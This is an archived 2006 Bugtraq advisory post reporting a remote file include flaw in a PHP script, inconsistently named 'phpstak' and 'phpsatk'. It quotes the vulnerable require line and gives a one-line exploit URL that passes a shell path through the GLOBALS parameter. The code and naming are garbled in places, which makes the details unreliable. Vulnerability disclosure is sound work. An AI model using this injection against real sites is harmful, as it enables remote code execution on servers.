phpstak <= Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpstak <= Remote File Include Vulnerability
From: h4ck3riran@xxxxxxxxx
Date: 24 Sep 2006 07:19:32 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*******************************************************************************
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                           PerSiaNFoX DigitaL SecuritY TeaM  
                                               ***                              
                                                                               
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
*******************************************************************************

<# phpsatk<=  Remote File Include Vulnerabilities 

<# Script.............. : phpsatk
<# Discovered By.... : Root3r_H3ll      
<# Location .......... : Iran
<# Class..............  : Remote
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds

-------------------------------------------------------------------------------------------------------------

< # CodE : 
   require $GLOBALS 'config'


<# Expolit :

Www.Site.coM/[path]/loader.php?GLOBALS=Sh3ll

Prev by Date: Typo3 v4.x: XSS in extension "Indexed Search" v2.9.0
Next by Date: RSA Keyon Log verification bypass vulnerability
Previous by thread: Typo3 v4.x: XSS in extension "Indexed Search" v2.9.0
Next by thread: ZERT patch [was: 0day for IE (Disabling Javascript no longer a fix)]
Index(es):
- Date
- Thread